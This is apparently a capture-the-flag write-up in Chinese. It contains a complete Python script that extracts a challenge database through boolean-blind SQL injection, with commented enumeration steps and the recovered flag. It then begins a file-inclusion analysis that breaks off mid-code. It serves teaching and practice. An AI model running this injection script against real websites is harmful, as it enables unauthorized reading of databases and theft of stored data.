WEB
Web1
很简单:id 参数存在布尔盲注,脚本以响应中是否包含 "Hacker" 来判断条件真假,直接上脚本。
#_*_coding:utf-8_*_
import requests
import string
def get_content1(s):
    """Recover the result of SQL expression *s* one character at a time.

    For each position 1..49 and each printable ASCII code 32..126, the
    function requests index.php with an ``id`` value that compares the
    ASCII code of that character of ``(s)`` against the candidate. A
    response containing "Hacker" is taken as a match. The partial result
    is printed every time it grows and once more at the end; nothing is
    returned.

    The scan stops at the first position where no candidate matches.

    NOTE(review): written for Python 2 -- the response body is encoded to a
    byte string before the substring test, which raises TypeError on
    Python 3.
    NOTE(review): the server-side code is not shown here; presumably ``id``
    reaches a SQL statement unescaped and the page content depends on the
    query result. Binding ``id`` as a typed query parameter would remove
    this true/false signal.
    """
    # Challenge endpoint; the probe expression is appended as the id value.
    base = 'http://882f7dfa1dfa4a4db6a3f073371526c8d0a65024718440ce.game.ichunqiu.com/index.php?id='
    recovered = ''
    for pos in range(1, 50):
        matched = False
        for code in range(32, 127):
            probe = ('(select ascii(substr((' + str(s) + '),' + str(pos)
                     + ',1)) like ' + str(code) + ')')
            body = requests.get(base + probe).text.encode('utf-8')
            if "Hacker" not in body:
                continue
            # The marker appeared, so this candidate is accepted.
            recovered += chr(code)
            matched = True
            print(recovered)
            break
        if not matched:
            # No printable character matched: treat as end of the value.
            break
    print(recovered)
# Enumeration steps used for this challenge, kept for reference. Each
# commented-out call is followed by the value it printed.
# get_content1("database()")
#   -> words
# get_content1("select schema_name from information_schema.schemata limit 0,1")
#   -> words
# 0x776f726473 is the hex encoding of "words".
# get_content1("select table_name from information_schema.tables where table_schema like 0x776f726473 limit 0,1")
#   -> f14g
# 0x66313467 is the hex encoding of "f14g".
# get_content1("select column_name from information_schema.columns where table_name like 0x66313467 limit 0,1")
#   -> f14g
# Final step: read the first row of column f14g from table f14g.
get_content1(s="select f14g from f14g limit 0,1")
#   -> flag{0fabacd1-fda2-4899-8cc5-711105c286f7}
Web2
一开始以为是 git 源码泄露,但并不是,实际上是文件包含:
http://e0c9660c9d3f4434a7e8590db1add9fa7466d50e0ff34c91.game.ichunqiu.com/index.php?action=index
<?php
include "function.php";
if(isset($_GET["action"])){
$page = addslashes($_GET["action"